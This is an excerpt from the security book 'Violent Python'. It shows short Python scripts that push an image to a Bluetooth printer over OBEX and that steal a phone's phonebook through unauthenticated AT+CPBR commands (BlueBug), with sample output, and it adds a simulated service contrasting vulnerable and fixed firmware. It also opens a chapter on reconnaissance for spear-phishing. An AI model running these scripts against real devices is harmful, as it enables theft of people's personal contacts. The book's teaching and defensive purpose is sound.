Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers

Taking Over a Printer with Python ObexFTP

Let’s continue our attack against the printer. As it offers OBEX Object Push on RFCOMM Port 2, let’s try to push it an image. We will use obexftp to connect to the printer. Next, we will send it an image file from our attacker workstation called /tmp/ninja.jpg. When the file transfer succeeds, our printer begins printing a nice picture of a ninja for us. This is exciting, but not necessarily dangerous, so we will continue to use this methodology in the next section to carry out more lethal attacks against phones that offer Bluetooth services.

 import obexftp  # Python bindings for the obexftp client library, as used throughout the book

 try:
     # The printer advertised OBEX Object Push on RFCOMM channel 2 (found in the previous scan)
     btPrinter = obexftp.client(obexftp.BLUETOOTH)
     btPrinter.connect('00:16:38:DE:AD:11', 2)
     btPrinter.put_file('/tmp/ninja.jpg')
     print('[+] Printed Ninja Image.')
 except Exception:
     print('[-] Failed to print Ninja Image.')

From The Trenches
Paris Hilton Not Hacked By Bluetooth

In 2005, Paris Hilton was a lesser-known reality celebrity. However, that all changed when a viral video surfaced on the Internet. The courts later convicted a 17-year-old Massachusetts teenager for hacking Paris Hilton’s T-Mobile Sidekick. After gaining access, the 17-year-old stole the contents of Paris’s address book, notepad and photos and published them to the Internet; history knows the rest. The minor served 11 months in a juvenile detention facility for his crimes (Krebs, 2005). The attack occurred only two days after the public release of the first Bluetooth worm, known as Cabir. Quick to provide a report, several news agencies falsely reported that the attack occurred over a Bluetooth vulnerability on Paris’s phone. However, the attacker actually used a flaw that allowed him to reset the passwords of Paris’s phone in order to gain access. While the reports proved to be false, they did bring national attention to several lesser-discussed vulnerabilities of the Bluetooth protocol.

BlueBugging a Phone with Python

In this section, we will replicate a recent attack vector against Bluetooth-enabled phones. Originally dubbed a BlueBug attack, this attack uses an unauthenticated and unsecured connection on a phone to steal the details of the phone or issue commands directly to the phone. This attack uses the RFCOMM channel to issue AT commands as a tool to remotely control the device. This allows an attacker to read and write SMS messages, gather personal information, or force dial a 1–900 number.

For example, an attacker could control a Nokia 6310i phone (up to firmware version 5.51) over RFCOMM channel 17. On those earlier firmware versions of the phone, RFCOMM channel 17 required no authentication for a connection. An attacker could simply scan for open RFCOMM channels, find the open RFCOMM 17 channel, and then connect and issue an AT command to dump the phonebook.

Let us replicate this attack in Python. Again, we will need to import the Python bindings to the BlueZ API. After identifying our target address and vulnerable RFCOMM port, we create a connection to the open, unauthenticated, and unencrypted port. Using this newly created connection, we issue a command such as “AT+CPBR=1” to dump the first contact in the phonebook. Repeating this command for subsequent values steals the entire phonebook.

 import bluetooth  # PyBluez bindings for the BlueZ stack

 tgtPhone = 'AA:BB:CC:DD:EE:FF'
 port = 17  # RFCOMM channel that the vulnerable firmware leaves unauthenticated

 phoneSock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
 phoneSock.connect((tgtPhone, port))

 # AT+CPBR=<n> reads phonebook entry n; the text and sample output cover entries 1 to 5
 for contact in range(1, 6):
     atCmd = 'AT+CPBR=' + str(contact) + '\n'
     phoneSock.send(atCmd)
     result = phoneSock.recv(1024)
     print('[+] ' + str(contact) + ': ' + result)

 phoneSock.close()

Running our attack against a vulnerable phone, we can dump the first five contacts in the phone. Less than fifteen lines of code and we can remotely steal a phonebook over Bluetooth. Outstanding!

 attacker# python bluebug.py
 [+] 1: +CPBR: 1,"555-1234",,"Joe Senz"
 [+] 2: +CPBR: 2,"555-9999",,"Jason Brown"
 [+] 3: +CPBR: 3,"555-7337",,"Glen Godwin"
 [+] 4: +CPBR: 4,"555-1111",,"Semion Mogilevich"
 [+] 5: +CPBR: 5,"555-8080",,"Robert Fisher"
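The weakness in both the printer and the phone case above is a service that acts on requests before the link is authenticated; the firmware fix for the phone is to refuse AT commands until pairing has completed. As an added illustration (not code from the book), here is a simulated phonebook service that answers the AT+CPBR command in both modes, with a constructed phonebook standing in for the phone; the PhoneBookService class, the require_auth flag and the link_authenticated parameter are assumptions of this example.

```python
import re

# Constructed sample phonebook standing in for the phone's memory (names from the sample output).
SAMPLE_PHONEBOOK = {
    1: ("555-1234", "Joe Senz"),
    2: ("555-9999", "Jason Brown"),
    3: ("555-7337", "Glen Godwin"),
    4: ("555-1111", "Semion Mogilevich"),
    5: ("555-8080", "Robert Fisher"),
}

# AT+CPBR=<index> or AT+CPBR=<first>,<last> (3GPP TS 27.007 phonebook read).
CPBR_RE = re.compile(r"^AT\+CPBR=(\d+)(?:,(\d+))?$", re.IGNORECASE)


class PhoneBookService:
    """Hypothetical AT command handler sitting behind an RFCOMM channel.

    require_auth=False models the pre-5.51 behaviour: any peer that reaches
    the channel can read the phonebook. require_auth=True models the fix:
    commands are refused unless the link was authenticated (pairing done).
    """

    def __init__(self, phonebook, require_auth=True):
        self.phonebook = phonebook
        self.require_auth = require_auth

    def handle(self, command, link_authenticated):
        """Return the response lines for one AT command line."""
        if self.require_auth and not link_authenticated:
            # Hardened path: an unpaired peer learns nothing, not even whether an index exists.
            return ["ERROR"]
        match = CPBR_RE.match(command.strip())
        if not match:
            return ["ERROR"]  # only the phonebook read command is simulated here
        first = int(match.group(1))
        last = int(match.group(2)) if match.group(2) else first
        lines = []
        for index in range(first, last + 1):
            if index in self.phonebook:
                number, name = self.phonebook[index]
                # Same layout as the sample output: +CPBR: <index>,<number>,<type>,<text>
                # (the <type> field is left empty, as in that output).
                lines.append('+CPBR: %d,"%s",,"%s"' % (index, number, name))
        lines.append("OK")
        return lines
```

Running the unauthenticated loop from the attack script against a require_auth=True service yields only ERROR lines, which is the observable difference between the vulnerable and the fixed firmware.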

Chapter Wrap Up

Congratulations! We have written quite a few tools in the chapter that we can use to audit our wireless networks and Bluetooth devices. We started by intercepting wireless networks for personal information. Next, we examined how to dissect 802.11 wireless traffic in order to discover preferred networks and find hidden access points. Following that we crash-landed an unmanned aerial vehicle and built a tool to identify wireless hacker toolkits. For the Bluetooth protocol, we built a tool to locate Bluetooth devices, scan them, and exploit a printer and a phone.

Hopefully, you have enjoyed this chapter. I have enjoyed writing it. I cannot say the same for my wife, who had to deal with endless pictures of ninjas showing up on her printer, her iPhone battery mysteriously draining, and the home access point suddenly becoming hidden, or for my five-year-old daughter, whose toy UAV kept falling out of the sky as daddy refined his code. In the next chapter, we will examine some ways of doing open source reconnaissance of social media networks using Python.

References

1. Adams, D. (1980). The hitchhiker’s guide to the galaxy (Perma-Bound ed.). New York: Ballantine Books.

2. Butler, E. (2010, October 24). Firesheep. Retrieved from <http://codebutler.com/firesheep>.

3. Friedberg, S. (2010, June 3). Source code analysis of gstumbler. Retrieved from <static.googleusercontent.com/external_content/untrusted_dlcp/www.google.com/en/us/googleblogs/pdfs/friedberg_sourcecode_analysis_060910.pdf>.

4. Albert Gonzalez v. United States of America (2008, August 5). U.S.D.C. District of Massachusetts 08-CR-10223. Retrieved from <www.justice.gov/usao/ma/news/IDTheft/Gonzalez,%20Albert%20-%20Indictment%20080508.pdf>.

5. Herfurt, M. (2004, March 1). Bluesnarfing @ CeBIT 2004—Detecting and attacking bluetooth-enabled cellphones at the Hannover fairground. Retrieved from <trifinite.org/Downloads/BlueSnarf_CeBIT2004.pdf>.

6. Krebs, B. (2005, November 13). Teen pleads guilty to hacking Paris Hilton’s phone. The Washington Post. Retrieved from <http://www.washingtonpost.com/wp-dyn/content/article/2005/09/13/AR2005091301423.html>.

7. McCullagh, D. (2009, December 17). U.S. was warned of predator drone hacking. CBS News. Retrieved from <http://www.cbsnews.com/8301-504383_162-5988978-504383.html>.

8. Peretti, K. (2009). Data breaches: What the underground world of carding reveals. Retrieved from <www.justice.gov/criminal/cybercrime/DataBreachesArticle.pdf>.

9. Shane, S. (2009, December 18). Officials say Iraq fighters intercepted drone video. NYTimes.com. Retrieved from <http://www.nytimes.com/2009/12/18/world/middleeast/18drones.html>.

10. SkyGrabber. (2011). Official site for programs SkyGrabber. Retrieved from <http://www.skygrabber.com/en/index>.

11. US Secret Service (2007, September 13). California man arrested on wire fraud, identity theft charges. Press Release, US Secret Service. Retrieved from <www.secretservice.gov/press/GPA11-07_PITIndictment.pdf>.

12. Zetter, K. (2009, June 18). TJX hacker was awash in cash; his penniless coder faces prison. Wired. Retrieved from <www.wired.com/threatlevel/2009/06/watt>.

Chapter 6
Web Recon with Python

Information in this chapter:

 Anonymously Browsing the Internet with the Mechanize Class
 Mirroring Website Elements in Python Using Beautiful Soup
 Interacting with Google Using Python
 Interacting with Twitter Using Python
 Automated Spear-Phishing

During my eighty-seven years I have witnessed a whole succession of technological revolutions. But none of them has done away with the need for character in the individual or the ability to think.

—Bernard M. Baruch, Presidential Advisor to the 28th and 32nd US Presidents

Introduction: Social Engineering Today

In 2010, two large-scale cyber attacks changed the nature of how we understand cyber warfare today. We previously discussed Operation Aurora in Chapter 4. During Operation Aurora, hackers targeted multinational businesses “including Yahoo, Symantec, Adobe, Northrop Grumman and Dow Chemical,” as well as several Gmail accounts (Cha & Nakashima, 2010, p. 2). The Washington Post went on to describe this attack as having “a new level of sophistication” at the time of its discovery and investigation. Stuxnet, the second attack, targeted SCADA systems, particularly those in Iran (AP, 2010). Network defenders should be concerned about the developments found in Stuxnet, which was “a more mature and technologically advanced (semi-) targeted attack than Aurora” (Matrosov, Rodionov, Harley & Malcho, 2010). Despite these two cyber attacks being very sophisticated, they both shared one critical similarity: they spread, at least in part, due to social engineering (Constantin, 2012). No matter how sophisticated or deadly a cyber attack becomes, the presence of effective social engineering will always increase the attack’s effectiveness. In the following chapter, we will examine how we can use Python to automate a social-engineering attack.

Before any operation can be undertaken, an attacker should have detailed knowledge of the target: the more information an attacker possesses, the greater the chance that the attack will succeed. This concept extends to the world of information warfare as well. In this domain, and in today’s age, most of the information required can be found on the Internet. The likelihood of an important piece of information being overlooked is high, due to the vast scale of the Internet. To prevent this loss of information, a computer program can be used to automate the entire process. Python is an excellent tool for the automation task because of the large number of third-party libraries that have been written to allow for easy interaction with websites and the Internet.

Recon Prior to Attack

In this chapter we will go through the process of performing reconnaissance against a target. The key aspects of this process are ensuring that we gather the maximum amount of information possible, while not being detected by the extremely vigilant and capable network administrator at the company headquarters. Finally, we will look at how aggregating data allows for a highly sophisticated and personalized social-engineering attack against this entity. Ensure that before applying any of these techniques against others, you consult with law enforcement officials or legal advice. We have depicted these attacks here to show the tools used in such attacks in order to better understand their approach and understand how to defend against them in our own lives.
